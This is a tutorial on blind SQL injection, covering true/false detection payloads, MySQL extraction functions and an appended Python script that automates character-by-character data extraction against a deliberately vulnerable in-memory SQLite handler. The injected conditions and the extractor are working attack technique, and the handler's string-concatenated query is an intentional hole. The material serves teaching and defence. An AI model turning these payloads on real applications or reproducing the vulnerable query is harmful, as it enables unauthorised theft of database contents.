BLIND SQL INJECTION - WEB APPLICATION VULNERABILITY TUTORIAL



Blind SQL injection is the technique used when the web application is vulnerable but neither the query results nor the database error messages are displayed to the attacker. When the attacker tries an ordinary injection, the application redirects to some other page or shows a generic page instead of an error message. Blind SQL injection is harder to carry out than the traditional (error-based) technique described above and takes considerably longer, because every fact about the database has to be inferred indirectly. Several tools automate it.
Blind SQL injection works by asking the database a sequence of true/false questions: each injected condition changes the page's behaviour (same page vs. redirect or empty page), and that difference leaks one bit of information at a time.

How to detect the Blind SQL Injection Vulnerability?
The web application takes the client's input and puts it directly into the WHERE clause of a query that reads data from the database. For instance, suppose the application takes an id parameter and builds the SQL statement by string concatenation:
Statement = "SELECT * FROM userinfo WHERE id=" + id;
Recall that a WHERE clause can combine conditions with the operators AND and OR. The attacker detects the vulnerability by appending a compound condition to the input.
For instance, the attacker can enter the id value
1 AND 1=1
so the query becomes
SELECT * FROM userinfo WHERE id=1 AND 1=1
Because 1=1 is always true, this returns exactly the same row as id=1 alone, so the page looks identical to the normal response. Next the attacker sends the always-false condition
1 AND 1=2
The query now returns no row, and the application shows an error page, redirects, or renders an empty page. If a true condition leaves the page unchanged while a false condition changes it, the application is evaluating the attacker's condition and is very likely vulnerable. The root cause is that the developer fails to validate that id is a number (or to use a parameterised query), so whatever is typed into id is interpreted as SQL. This two-response behaviour is the oracle used for the rest of the attack: a true condition gives the normal page, a false condition gives a different one.

Some Functions to Know
The following (MySQL) functions are useful for blind SQL injection, because they let the attacker turn an unknown value into a series of yes/no comparisons.
substring(str, pos, length) returns the part of the string that starts at character position pos (counting from 1) and is length characters long.

For instance substring('hello', 2, 1) returns 'e'.
Here the string is 'hello', the position is 2 (the character 'e'), and the length is 1.
  • lower(str) converts the string to lower case, so a case-insensitive comparison needs fewer guesses.
  • ascii(c) returns the ASCII code of the first character of c, which lets a character be found by numeric comparison (for example ascii(substring(...)) > 64).
  • length(str) returns the length of the string, used first to learn how many characters have to be extracted.
  • user() returns the current database user, for example root@localhost (not necessarily an administrator account).
  • database() returns the name of the current database.
  • version() returns the version of the database server.
Each of these is placed inside an injected condition, for example 1 AND ascii(substring(user(),1,1))>100, and the true/false response of the page reveals the answer.
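The following is an added example, not code from the original tutorial, that puts the detection step and the extraction functions together end to end. It models the vulnerable handler above with an in-memory SQLite database (the userinfo table and its rows are constructed for the demo), treats "a row came back" as the normal page and "no row or SQL error" as the redirect/error page, and then leaks a value one character at a time through that true/false oracle. SQLite's substr() and unicode() stand in for MySQL's substring() and ascii(); the binary search over the character code is the practitioner's usual refinement and is not part of the original text.

```python
import sqlite3


def build_db():
    """Constructed sample database standing in for the tutorial's userinfo table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userinfo (id INTEGER, name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO userinfo VALUES (?, ?, ?)",
        [(1, "alice", "s3cret!"), (2, "bob", "hunter2")],
    )
    return conn


CONN = build_db()


def vulnerable_lookup(id_param: str) -> bool:
    """Models the tutorial's handler: id is concatenated straight into the
    WHERE clause. Returns True when the page would render normally (a row
    came back) and False when it would redirect or error (no row, or the
    injected text broke the SQL). This is deliberately vulnerable code."""
    query = "SELECT * FROM userinfo WHERE id=" + id_param
    try:
        return CONN.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False


def is_vulnerable(base_id: str = "1") -> bool:
    """Detection step: the untampered request and the request with an
    always-true condition must behave the same, and an always-false
    condition must behave differently."""
    normal = vulnerable_lookup(base_id)
    with_true = vulnerable_lookup(f"{base_id} AND 1=1")
    with_false = vulnerable_lookup(f"{base_id} AND 1=2")
    return normal and with_true and not with_false


def extract_string(expr: str, base_id: str = "1", max_len: int = 64) -> str:
    """Leak the value of a SQL expression through the true/false oracle.

    expr is any SQL expression or scalar subquery, e.g. "sqlite_version()"
    or "SELECT secret FROM userinfo WHERE name='alice'" (the MySQL
    equivalents would be version(), user(), database(), ...).
    """
    # Step 1: learn the length so we know how many characters to extract.
    length = 0
    for n in range(max_len + 1):
        if vulnerable_lookup(f"{base_id} AND length(({expr}))={n}"):
            length = n
            break

    # Step 2: for each position, binary-search the character code with
    # unicode(substr(...)) > mid (MySQL: ascii(substring(...)) > mid).
    # About 7 requests per character instead of up to 127 equality tests.
    out = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"{base_id} AND unicode(substr(({expr}),{pos},1))>{mid}"
            if vulnerable_lookup(probe):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    print("vulnerable:", is_vulnerable())
    print("alice's secret:", extract_string("SELECT secret FROM userinfo WHERE name='alice'"))
    print("db version:", extract_string("sqlite_version()"))
```

Every request carries a single yes/no question, exactly as the tutorial describes; the only things that change between the toy and a real target are the transport (an HTTP request instead of a function call) and how the oracle is judged (page content, status code, redirect, or response time instead of a boolean).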
